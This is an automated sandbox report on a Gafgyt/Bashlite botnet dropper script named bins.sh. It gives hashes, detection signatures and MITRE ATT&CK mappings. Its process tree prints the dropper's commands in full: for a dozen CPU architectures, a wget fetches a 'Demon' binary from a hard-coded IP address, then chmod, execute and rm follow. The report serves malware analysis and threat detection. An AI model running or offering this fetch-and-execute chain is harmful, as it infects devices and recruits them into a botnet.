gafgyt | bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0

General

Target

bins.sh
Size

2KB
MD5

a754f4cf9d6ba2d574cd90bf04d1bc35
SHA1

b0191e89c26057b6132f3314fa685e1879c7dc62
SHA256

bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
SHA512

600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 1 IoCs

Processes:

resource	yara_rule
/tmp/Demon.mips	family_gafgyt

Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

703 chmod
718 chmod
740 chmod
800 chmod
806 chmod
686 chmod
679 chmod
750 chmod
759 chmod
775 chmod
793 chmod
668 chmod
Executes dropped EXE 1 IoCs

Processes:

Demon.mips

ioc pid process

/tmp/Demon.mips 670 Demon.mips

pid	process
703	chmod
718	chmod
740	chmod
800	chmod
806	chmod
686	chmod
679	chmod
750	chmod
759	chmod
775	chmod
793	chmod
668	chmod

ioc	pid	process
/tmp/Demon.mips	670	Demon.mips

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

Processes:

Demon.arm6Demon.arm4Demon.arm5

description	ioc	process
File opened for reading	/proc/net/route	Demon.arm6
File opened for reading	/proc/net/route	Demon.arm4
File opened for reading	/proc/net/route	Demon.arm5

Changes its process name 3 IoCs

Processes:

Demon.arm6Demon.arm4Demon.arm5

description	pid	process
Changes the process name, possibly in an attempt to hide itself	720	Demon.arm6
Changes the process name, possibly in an attempt to hide itself	801	Demon.arm4
Changes the process name, possibly in an attempt to hide itself	807	Demon.arm5

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

Demon.arm4Demon.arm5Demon.arm6

description	ioc	process
File opened for reading	/proc/net/route	Demon.arm4
File opened for reading	/proc/net/route	Demon.arm5
File opened for reading	/proc/net/route	Demon.arm6

System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

Demon.mipsrmwget

pid process

670 Demon.mips
672 rm
646 wget

pid	process
670	Demon.mips
672	rm
646	wget

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
File opened for modification	/tmp/Demon.mpsl	wget
File opened for modification	/tmp/Demon.sh4	wget
File opened for modification	/tmp/Demon.arm6	wget
File opened for modification	/tmp/Demon.m68k	wget
File opened for modification	/tmp/Demon.arm4	wget
File opened for modification	/tmp/Demon.mips	wget
File opened for modification	/tmp/Demon.x86	wget
File opened for modification	/tmp/Demon.i686	wget
File opened for modification	/tmp/Demon.ppc	wget
File opened for modification	/tmp/Demon.i586	wget
File opened for modification	/tmp/Demon.sparc	wget
File opened for modification	/tmp/Demon.arm5	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:644

/usr/bin/wget
wget http://38.123.149.216/Demon.mips
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:646

/bin/chmod
chmod +x Demon.mips
2⤵
- File and Directory Permissions Modification
PID:668

/tmp/Demon.mips
./Demon.mips
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:670

/bin/rm
rm -rf Demon.mips
2⤵
- System Network Configuration Discovery
PID:672

/usr/bin/wget
wget http://38.123.149.216/Demon.mpsl
2⤵
- Writes file to tmp directory
PID:674

/bin/chmod
chmod +x Demon.mpsl
2⤵
- File and Directory Permissions Modification
PID:679

/tmp/Demon.mpsl
./Demon.mpsl
2⤵
PID:680

/bin/rm
rm -rf Demon.mpsl
2⤵
PID:682

/usr/bin/wget
wget http://38.123.149.216/Demon.sh4
2⤵
- Writes file to tmp directory
PID:683

/bin/chmod
chmod +x Demon.sh4
2⤵
- File and Directory Permissions Modification
PID:686

/tmp/Demon.sh4
./Demon.sh4
2⤵
PID:687

/bin/rm
rm -rf Demon.sh4
2⤵
PID:690

/usr/bin/wget
wget http://38.123.149.216/Demon.x86
2⤵
- Writes file to tmp directory
PID:692

/bin/chmod
chmod +x Demon.x86
2⤵
- File and Directory Permissions Modification
PID:703

/tmp/Demon.x86
./Demon.x86
2⤵
PID:704

/bin/rm
rm -rf Demon.x86
2⤵
PID:706

/usr/bin/wget
wget http://38.123.149.216/Demon.arm6
2⤵
- Writes file to tmp directory
PID:708

/bin/chmod
chmod +x Demon.arm6
2⤵
- File and Directory Permissions Modification
PID:718

/tmp/Demon.arm6
./Demon.arm6
2⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:720

/bin/rm
rm -rf Demon.arm6
2⤵
PID:723

/usr/bin/wget
wget http://38.123.149.216/Demon.i686
2⤵
- Writes file to tmp directory
PID:725

/bin/chmod
chmod +x Demon.i686
2⤵
- File and Directory Permissions Modification
PID:740

/tmp/Demon.i686
./Demon.i686
2⤵
PID:741

/bin/rm
rm -rf Demon.i686
2⤵
PID:744

/usr/bin/wget
wget http://38.123.149.216/Demon.ppc
2⤵
- Writes file to tmp directory
PID:745

/bin/chmod
chmod +x Demon.ppc
2⤵
- File and Directory Permissions Modification
PID:750

/tmp/Demon.ppc
./Demon.ppc
2⤵
PID:751

/bin/rm
rm -rf Demon.ppc
2⤵
PID:753

/usr/bin/wget
wget http://38.123.149.216/Demon.i586
2⤵
- Writes file to tmp directory
PID:754

/bin/chmod
chmod +x Demon.i586
2⤵
- File and Directory Permissions Modification
PID:759

/tmp/Demon.i586
./Demon.i586
2⤵
PID:760

/bin/rm
rm -rf Demon.i586
2⤵
PID:763

/usr/bin/wget
wget http://38.123.149.216/Demon.m68k
2⤵
- Writes file to tmp directory
PID:764

/bin/chmod
chmod +x Demon.m68k
2⤵
- File and Directory Permissions Modification
PID:775

/tmp/Demon.m68k
./Demon.m68k
2⤵
PID:776

/bin/rm
rm -rf Demon.m68k
2⤵
PID:779

/usr/bin/wget
wget http://38.123.149.216/Demon.sparc
2⤵
- Writes file to tmp directory
PID:780

/bin/chmod
chmod +x Demon.sparc
2⤵
- File and Directory Permissions Modification
PID:793

/tmp/Demon.sparc
./Demon.sparc
2⤵
PID:794

/bin/rm
rm -rf Demon.sparc
2⤵
PID:796

/usr/bin/wget
wget http://38.123.149.216/Demon.arm4
2⤵
- Writes file to tmp directory
PID:797

/bin/chmod
chmod +x Demon.arm4
2⤵
- File and Directory Permissions Modification
PID:800

/tmp/Demon.arm4
./Demon.arm4
2⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:801

/bin/rm
rm -rf Demon.arm4
2⤵
PID:804

/usr/bin/wget
wget http://38.123.149.216/Demon.arm5
2⤵
- Writes file to tmp directory
PID:805

/bin/chmod
chmod +x Demon.arm5
2⤵
- File and Directory Permissions Modification
PID:806

/tmp/Demon.arm5
./Demon.arm5
2⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:807

/bin/rm
rm -rf Demon.arm5
2⤵
PID:810

/usr/bin/wget
wget http://38.123.149.216/Demon.arm7
2⤵
PID:811

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

3

T1016

Internet Connection Discovery

2

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Demon.mips

Filesize
211KB

MD5
455a2acf75de8da6ab7c4d9564cc69f9

SHA1
9e6016c6581289e685bcd6392bbf0bcf6b1182ff

SHA256
b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152

SHA512
a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads